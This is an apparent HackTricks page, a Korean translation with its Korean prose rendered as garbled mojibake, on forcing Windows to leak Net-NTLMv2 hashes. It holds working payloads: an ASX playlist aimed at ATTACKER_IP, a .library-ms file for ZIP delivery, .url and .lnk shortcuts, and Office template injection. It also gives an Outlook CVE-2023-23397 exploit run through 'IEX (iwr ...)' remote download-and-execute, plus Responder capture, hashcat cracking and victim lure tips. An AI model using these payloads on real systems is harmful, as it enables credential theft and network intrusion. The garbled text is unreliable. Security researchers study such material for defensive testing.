NTLM creds๋ฅผ ํ์น ์ ์๋ ์ฅ์
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๋ค์์ ํ๋ฅญํ ์์ด๋์ด๋ค์ ํ์ธํ์ธ์: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ โ ์จ๋ผ์ธ์์ microsoft word ํ์ผ์ ๋ค์ด๋ก๋ํ๋ ๊ฒฝ์ฐ๋ถํฐ ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md ๋ฐ https://github.com/p0dalirius/windows-coerced-authentication-methods๊น์ง ํ์ธํด ๋ณด์ธ์.
Windows Media Player playlists (.ASX/.WAX)
์ ์ดํ๋ Windows Media Player playlist๋ฅผ ๋์์ด ์ด๊ฑฐ๋ ๋ฏธ๋ฆฌ๋ณด๊ธฐํ๋๋ก ๋ง๋ค ์ ์๋ค๋ฉด, ํญ๋ชฉ์ UNC ๊ฒฝ๋ก๋ก ์ง์ ํด์ NetโNTLMv2๋ฅผ leakํ ์ ์์ต๋๋ค. WMP๋ ์ฐธ์กฐ๋ ๋ฏธ๋์ด๋ฅผ SMB๋ฅผ ํตํด ๊ฐ์ ธ์ค๋ ค๊ณ ์๋ํ๋ฉฐ ์๋ฌต์ ์ผ๋ก ์ธ์ฆํฉ๋๋ค.
Example payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
์์ง ๋ฐ ํฌ๋ํน ํ๋ฆ:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
ZIP์ ํฌํจ๋ .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer๋ ZIP ์์นด์ด๋ธ ๋ด์์ ์ง์ ์ด๋ฆด ๋ .library-ms ํ์ผ์ ์์ ํ์ง ์๊ฒ ์ฒ๋ฆฌํฉ๋๋ค. ๋ผ์ด๋ธ๋ฌ๋ฆฌ ์ ์๊ฐ ์๊ฒฉ UNC ๊ฒฝ๋ก(์: \attacker\share)๋ฅผ ๊ฐ๋ฆฌํค๋ฉด, ZIP ์์์ .library-ms๋ฅผ ๋จ์ํ ์ฐพ์๋ณด๊ฑฐ๋ ์คํํ๋ ๊ฒ๋ง์ผ๋ก Explorer๊ฐ ํด๋น UNC๋ฅผ ์ด๊ฑฐํ๊ณ ๊ณต๊ฒฉ์์๊ฒ NTLM ์ธ์ฆ์ ์ ์กํฉ๋๋ค. ์ด๋ก ์ธํด NetNTLMv2๊ฐ ์์ฑ๋๋ฉฐ, cracked offline๋๊ฑฐ๋ ์ ์ฌ์ ์ผ๋ก relayed๋ ์ ์์ต๋๋ค.
๊ณต๊ฒฉ์ UNC๋ฅผ ๊ฐ๋ฆฌํค๋ ์ต์ .library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
์ด์ ๋จ๊ณ
- ์์ XML๋ก .library-ms ํ์ผ์ ์์ฑํฉ๋๋ค (IP/hostname์ ์ค์ ํ์ธ์).
- ์ด๋ฅผ ZIP์ผ๋ก ์์ถํฉ๋๋ค (on Windows: Send to โ Compressed (zipped) folder) ๊ทธ๋ฆฌ๊ณ ZIP์ ๋์์ ์ ๋ฌํฉ๋๋ค.
- NTLM capture listener๋ฅผ ์คํํ๊ณ ํผํด์๊ฐ ZIP ๋ด๋ถ์์ .library-ms๋ฅผ ์ด ๋๊น์ง ๊ธฐ๋ค๋ฆฝ๋๋ค.
Outlook ์บ๋ฆฐ๋ ์๋ฆผ ์ฌ์ด๋ ๊ฒฝ๋ก (CVE-2023-23397) โ zeroโclick NetโNTLMv2 leak
Microsoft Outlook for Windows๋ ์บ๋ฆฐ๋ ํญ๋ชฉ์์ ํ์ฅ MAPI ํ๋กํผํฐ PidLidReminderFileParameter๋ฅผ ์ฒ๋ฆฌํ์ต๋๋ค. ํด๋น ํ๋กํผํฐ๊ฐ UNC ๊ฒฝ๋ก(์: \attacker\share\alert.wav)๋ฅผ ๊ฐ๋ฆฌํค๋ฉด, ๋ฆฌ๋ง์ธ๋๊ฐ ์ธ๋ฆด ๋ Outlook์ SMB ๊ณต์ ์ ์ ์ํ์ฌ ํด๋ฆญ ์์ด ์ฌ์ฉ์์ NetโNTLMv2๋ฅผ leakํ์ต๋๋ค. ์ด ๋ฌธ์ ๋ 2023๋ 3์ 14์ผ์ ํจ์น๋์์ง๋ง, ๋ ๊ฑฐ์/๋ฏธ์ ๋ฐ์ดํธ๋ ์์คํ ๊ณผ ๊ณผ๊ฑฐ ์ธ์๋ํธ ๋์์๋ ์ฌ์ ํ ๋งค์ฐ ๊ด๋ จ์ด ์์ต๋๋ค.
Quick exploitation with PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
๋ฆฌ์ค๋ ์ธก:
sudo responder -I eth0 # or impacket-smbserver to observe connections
์ฐธ๊ณ
- ํผํด์๋ ์๋ฆผ์ด ํธ๋ฆฌ๊ฑฐ๋ ๋ Outlook for Windows๋ง ์คํ ์ค์ด๋ฉด ๋๋ค.
- ์ด leak๋ NetโNTLMv2๋ฅผ ์์ฑํ์ฌ offline cracking์ด๋ relay์ ์ ํฉํ๋ค( not passโtheโhash).
.LNK/.URL ์์ด์ฝ ๊ธฐ๋ฐ ์ ๋กโํด๋ฆญ NTLM leak (CVEโ2025โ50154 โ bypass of CVEโ2025โ24054)
Windows Explorer๋ ๋ฐ๋ก๊ฐ๊ธฐ ์์ด์ฝ์ ์๋์ผ๋ก ๋ ๋๋งํ๋ค. ์ต๊ทผ ์ฐ๊ตฌ์์๋ Microsoft์ 2025๋ 4์ UNCโicon shortcuts ํจ์น ์ดํ์๋, ๋ฐ๋ก๊ฐ๊ธฐ ๋์(target)์ UNC ๊ฒฝ๋ก์ ํธ์คํธํ๊ณ ์์ด์ฝ์ ๋ก์ปฌ์ ๋๋ฉด ํด๋ฆญ ์์ด NTLM ์ธ์ฆ์ ํธ๋ฆฌ๊ฑฐํ ์ ์์์ด ๋ฐํ์ก๋ค(ํจ์น ์ฐํ๋ก CVEโ2025โ50154๋ก ์ง์ ๋จ). ๋จ์ง ํด๋๋ฅผ ๋ณด๋ ๊ฒ๋ง์ผ๋ก Explorer๊ฐ ์๊ฒฉ ๋์์์ ๋ฉํ๋ฐ์ดํฐ๋ฅผ ๊ฐ์ ธ์ ๊ณต๊ฒฉ์ SMB ์๋ฒ๋ก NTLM์ ์ ์กํ๋ค.
์ต์ Internet Shortcut payload (.url):
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
PowerShell์ ํตํ Program Shortcut payload (.lnk):
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Delivery ideas
- ZIP์ shortcut์ ๋ฃ์ด ํผํด์๊ฐ ์ฐพ์๋ณด๋๋ก ์ ๋.
- ํผํด์๊ฐ ์ด์ด๋ณผ ์ฐ๊ธฐ ๊ฐ๋ฅํ share์ shortcut์ ๋๋ค.
- ๊ฐ์ ํด๋์ ๋ค๋ฅธ lure files์ ํจ๊ป ๋ฐฐ์นํด Explorer์์ ์์ดํ ์ ๋ฏธ๋ฆฌ๋ณด๊ธฐํ๋๋ก ํ๋ค.
Office remote template injection (.docx/.dotm) to coerce NTLM
Office ๋ฌธ์๋ ์ธ๋ถ template๋ฅผ ์ฐธ์กฐํ ์ ์๋ค. ์ฒจ๋ถ๋ template๋ฅผ UNC ๊ฒฝ๋ก๋ก ์ค์ ํ๋ฉด ๋ฌธ์๋ฅผ ์ด ๋ SMB๋ก ์ธ์ฆ์ด ์ํ๋๋ค.
Minimal DOCX relationship changes (inside word/):
- word/settings.xml์ ํธ์งํ๊ณ ์ฒจ๋ถ๋ template ์ฐธ์กฐ๋ฅผ ์ถ๊ฐ:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- word/_rels/settings.xml.rels๋ฅผ ํธ์งํ๊ณ rId1337์ ๊ทํ์ UNC๋ก ๊ฐ๋ฆฌํค๋๋ก ์ง์ ํ์ญ์์ค:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- .docx๋ก ์ฌํจํค์งํ์ฌ ์ ๋ฌํ๋ค. SMB capture listener๋ฅผ ์คํํ๊ณ ์ฐ๊ฒฐ์ด ์ด๋ฆด ๋๊น์ง ๊ธฐ๋ค๋ฆฐ๋ค.
์บก์ฒ ์ดํ NTLM relaying ๋๋ abusing์ ๊ดํ ์์ด๋์ด๋ ๋ค์์ ํ์ธํ์ธ์:
์ฐธ๊ณ ์๋ฃ
- HTB Fluffy โ ZIP .libraryโms auth leak (CVEโ2025โ24071/24055) โ GenericWrite โ AD CS ESC16 to DA (0xdf)
- HTB: Media โ WMP NTLM leak โ NTFS junction to webroot RCE โ FullPowers + GodPotato to SYSTEM
- Morphisec โ 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC โ Microsoft mitigates Outlook EoP (CVEโ2023โ23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate โ Zeroโclick, one NTLM: Microsoft security patch bypass (CVEโ2025โ50154)
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


